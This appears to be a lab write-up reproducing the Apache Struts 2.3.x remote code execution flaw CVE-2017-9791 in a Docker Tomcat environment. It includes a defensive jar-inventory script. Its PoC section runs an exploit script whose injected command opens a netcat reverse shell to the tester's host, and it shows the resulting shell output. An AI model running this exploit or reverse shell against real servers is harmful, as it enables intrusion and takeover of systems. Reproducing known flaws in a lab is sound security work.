0x01 Environment:
Linux f39e3e6b024a 3.13.0-61-generic #100-Ubuntu SMP Wed Jul 29 11:21:34 UTC 2015 x86_64 GNU/Linux
Docker
tomcat:9.0
Apache Struts 2.3.x Showcase
docker/
├── tomcat
│   └── Dockerfile
└── webapps
    ├── struts2-showcase
    └── struts2-showcase.war
Deploying the environment:
Dockerfile:
FROM tomcat:9.0
1. docker build -t eva/tomcat ./tomcat/
2. docker run -d -p 8080:8080 -v /root/docker/webapps/:/usr/local/tomcat/webapps -it eva/tomcat
To import different Struts builds, webapps is persisted through a bind mount, which makes it easy to switch Struts versions.
3. docker exec -it clever_wright /bin/bash
Accessing Struts 2.3.x:
http://10.160.11.191:8080/struts2-showcase/index.action#
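An added example, not part of the original post: a shell check that inventories the Struts jars under the mounted webapps directory, so that after switching versions it is clear which Struts core each deployed app carries and whether the Struts 1 plugin (the component CVE-2017-9791 concerns) is present. It assumes exploded webapps that keep their jars in WEB-INF/lib; the function names are hypothetical.

```shell
#!/bin/sh
# Added example: inventory Struts 2 jars under a Tomcat webapps directory.
# Assumption: each exploded webapp keeps its libraries in <app>/WEB-INF/lib.

# jar_version NAME LIBDIR
# Prints the version of the first NAME-<version>.jar in LIBDIR; fails if none.
jar_version() {
    for jar in "$2"/"$1"-[0-9]*.jar; do
        [ -e "$jar" ] || continue      # glob did not match anything
        base=${jar##*/}                # strip directory
        base=${base#"$1"-}             # strip "NAME-"
        printf '%s\n' "${base%.jar}"   # strip ".jar"
        return 0
    done
    return 1
}

# struts_inventory WEBAPPS_DIR
# One line per webapp that ships struts2-core:
#   <app> core=<version> struts1-plugin=<version|absent>
struts_inventory() {
    for lib in "$1"/*/WEB-INF/lib; do
        [ -d "$lib" ] || continue
        core=$(jar_version struts2-core "$lib") || continue
        plugin=$(jar_version struts2-struts1-plugin "$lib") || plugin=absent
        app=${lib%/WEB-INF/lib}
        printf '%s core=%s struts1-plugin=%s\n' "${app##*/}" "$core" "$plugin"
    done
}

# needs_review WEBAPPS_DIR
# Succeeds if any webapp pairs a 2.3.x core with the Struts 1 plugin.
needs_review() {
    struts_inventory "$1" | grep -Eq ' core=2\.3\.[^ ]* struts1-plugin=[0-9]'
}

# Stand-alone use: pass the host-side webapps path, e.g. /root/docker/webapps
if [ "$#" -gt 0 ]; then
    struts_inventory "$1"
fi
```

Run it on the Docker host against the bind-mounted directory, or inside the container against /usr/local/tomcat/webapps.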
0x02 PoC
# $ ncat -v -l -p 4444 &
# $ python CVE-2017-9791.py http://10.160.11.191:8080/struts2-showcase/integration/saveGangster.action "netcat -e /bin/bash 10.160.11.194 4444"
Successful exploitation:
root@kali:~/ctf# netcat -v -l -p 4444
listening on [any] 4444 ...
10.160.11.191: inverse host lookup failed: Unknown host
connect to [10.160.11.194] from (UNKNOWN) [10.160.11.191] 33823
cat etc/issue
Debian GNU/Linux 9 \n \l